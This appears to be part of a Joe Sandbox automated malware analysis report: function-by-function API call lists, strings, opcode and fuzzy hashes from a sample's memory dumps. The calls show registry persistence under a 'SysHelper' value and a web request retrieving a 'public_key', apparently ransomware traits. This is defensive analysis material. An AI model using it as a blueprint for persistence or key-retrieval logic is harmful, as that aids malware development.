                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                                                        • Opcode ID: 8c2a85307ade0c5beee60f62fbea8eb94b8743bb36ff53493b203de65c4c59dd
                                                                                                                                                                        • Instruction ID: f2e2d3af344797642c78ca24b093f7b51176a30ab4c4fa880a31cb25e96253e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c2a85307ade0c5beee60f62fbea8eb94b8743bb36ff53493b203de65c4c59dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 7CC15A71D0120AEBDF10DFA4DD89BEEBBF5BF14318F104069E405A7250EBB5AA58CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                                                        • Opcode ID: 317e61a4e10107377ff1548e6342cf7d81e2fa07a292889d506e59681050a81e
                                                                                                                                                                        • Instruction ID: 607c1b9985689d4279c1b45aae92c7fdad1cf5f1a6be0f6ef700dad108aa2abb
                                                                                                                                                                        • Opcode Fuzzy Hash: 317e61a4e10107377ff1548e6342cf7d81e2fa07a292889d506e59681050a81e
                                                                                                                                                                        • Instruction Fuzzy Hash: 7CA153B1C00249DBEF11EFE4C846BEEBFB5AF15314F140478E40576292D7B65649CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BF3350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                                                        • Opcode ID: 54c18a91abdadd4a7c6db9573608789c22d84eb41ee4c78bf919df2afadb4121
                                                                                                                                                                        • Instruction ID: 6200d33377725844d5fda074f14ce1014b9a22fbbfc5db450572befaf3599d7d
                                                                                                                                                                        • Opcode Fuzzy Hash: 54c18a91abdadd4a7c6db9573608789c22d84eb41ee4c78bf919df2afadb4121
                                                                                                                                                                        • Instruction Fuzzy Hash: 93412AA5B8835529FB32652DBC03FA667C58B50F11F0C48B1FB88EB2C2F791854E8195
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 00B9C6C2
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 00B9C6F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B9C700
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00B9C725
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B9C72E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                                                        • Opcode ID: 615d6e83b1974852fc2fb5cd6358e5c924535fe957c7d73d1b27739e1966299f
                                                                                                                                                                        • Instruction ID: 2346b984c533fb4e8e852bcb6e57e54bb5c6bd7e78420c09213aaa71a9475fdf
                                                                                                                                                                        • Opcode Fuzzy Hash: 615d6e83b1974852fc2fb5cd6358e5c924535fe957c7d73d1b27739e1966299f
                                                                                                                                                                        • Instruction Fuzzy Hash: 60111B75A40308FFDF119F90DC46BEEBBB8EB04719F1041A5EA10B21A1D7B15A54AB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BAE6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAE707
                                                                                                                                                                          • Part of subcall function 00B9C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 00BAE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BAE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BAE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00BAE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00BAE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00BAE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00BAE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00BAE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00BAEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00BAEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEC32
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                                                                                        • Opcode ID: a11c5f0be8447ea3a5e81e7e9b8b09d7eeb4158ac31f07f1dfa86f9f9c1203f8
                                                                                                                                                                        • Instruction ID: 3769bf816cf593b17960dbb37306e30f499aa58a5243b467f9003c230633148c
                                                                                                                                                                        • Opcode Fuzzy Hash: a11c5f0be8447ea3a5e81e7e9b8b09d7eeb4158ac31f07f1dfa86f9f9c1203f8
                                                                                                                                                                        • Instruction Fuzzy Hash: EB018C3044C385ABDA30DF209C49BDF7BD8AF52704F0448A9B98492182EB70E608C7A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB728B Relevance: 12.2, APIs: 8, Instructions: 202COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1678825546-0
                                                                                                                                                                        • Opcode ID: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                                                                                        • Instruction ID: 6540c6ab289a9c3b78934d1fab0a521437b3d6676b3da272ecca4aab818a6175
                                                                                                                                                                        • Opcode Fuzzy Hash: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
                                                                                                                                                                        • Instruction Fuzzy Hash: 01718C71E892299FDF309A68CC99BF9B7F5EB94300F1440D9D808A7241EBB49E80CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB73EA Relevance: 10.6, APIs: 7, Instructions: 129COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2964551433-0
                                                                                                                                                                        • Opcode ID: d557015472455668169daba0af13f62936a880e47d77f1a2da5f1560c41c8796
                                                                                                                                                                        • Instruction ID: da0e1c8efa0278be183e8af6dce4ef0d3f6c36d2f6531f8d9718fcfb87ecca67
                                                                                                                                                                        • Opcode Fuzzy Hash: d557015472455668169daba0af13f62936a880e47d77f1a2da5f1560c41c8796
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F514E71E481299FDF309A68CC99BF9B7F5EB98300F0400D9E909A6251EBB59F84CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB73FA Relevance: 10.6, APIs: 7, Instructions: 127COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _write_multi_char$_write_string$__cftof_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2964551433-0
                                                                                                                                                                        • Opcode ID: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                                                                                        • Instruction ID: 7bb567d171f255887b3e80b287df397f72f955f4f5a355489a39580eabf4f895
                                                                                                                                                                        • Opcode Fuzzy Hash: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C512E71E491299FDF309A68CC99BF9B7F5EB94300F0400D9E909A6251EBB59F84CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BC06EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___unDName.LIBCMT ref: 00BC071B
                                                                                                                                                                        • _strlen.LIBCMT ref: 00BC072E
                                                                                                                                                                        • __lock.LIBCMT ref: 00BC074A
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BC075C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BC076D
                                                                                                                                                                        • _free.LIBCMT ref: 00BC07B6
                                                                                                                                                                          • Part of subcall function 00BB42FD: IsProcessorFeaturePresent.KERNEL32(00000017,00BB42D1,00BB3B69,?,?,00BB0CE9,00BB520D,?,00BB42DE,00000000,00000000,00000000,00000000,00000000,00BB981C), ref: 00BB42FF
                                                                                                                                                                        • _free.LIBCMT ref: 00BC07AF
                                                                                                                                                                          • Part of subcall function 00BB0BED: HeapFree.KERNEL32(00000000,00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C13
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3704956918-0
                                                                                                                                                                        • Opcode ID: b90c24e2c01a61d0e583f1c5962fd9f00d32f96ceafe992fd2b8c8969f1a385f
                                                                                                                                                                        • Instruction ID: 80c1d07d593f95993057a04a3198c2abcd26d825eaf58b6d2fe2aeef426e16be
                                                                                                                                                                        • Opcode Fuzzy Hash: b90c24e2c01a61d0e583f1c5962fd9f00d32f96ceafe992fd2b8c8969f1a385f
                                                                                                                                                                        • Instruction Fuzzy Hash: 142177B1925705EBD725BB648941FBFBBD4EF14710F1085EAF4589B282EBB4EC40CA90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM ref: 00BA1B1E
                                                                                                                                                                        • timeGetTime.WINMM ref: 00BA1B29
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1B4C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BA1B5C
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1B6A
                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00BA1B72
                                                                                                                                                                        • timeGetTime.WINMM ref: 00BA1B78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                                                        • Opcode ID: b6de8dda1827a0ac3357b60511bcd0d4c165d9e8a8a6cb539537e69e323668ab
                                                                                                                                                                        • Instruction ID: 0cb07de317dcffcf08b9e1cad4acd3065fc147a94c6bae8da69ede8c1afb327c
                                                                                                                                                                        • Opcode Fuzzy Hash: b6de8dda1827a0ac3357b60511bcd0d4c165d9e8a8a6cb539537e69e323668ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F01D436A41318AADB20A7E98C81FEDB3ACFB08B41F4400A5F700B70D0E670A940CBF5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB5141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __init_pointers.LIBCMT ref: 00BB5141
                                                                                                                                                                          • Part of subcall function 00BB7D6C: EncodePointer.KERNEL32(00000000,?,00BB5146,00BB3FFE,00C97990,00000014), ref: 00BB7D6F
                                                                                                                                                                          • Part of subcall function 00BB7D6C: __initp_misc_winsig.LIBCMT ref: 00BB7D8A
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BC26B3
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BC26C7
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BC26DA
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BC26ED
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BC2700
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BC2713
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BC2726
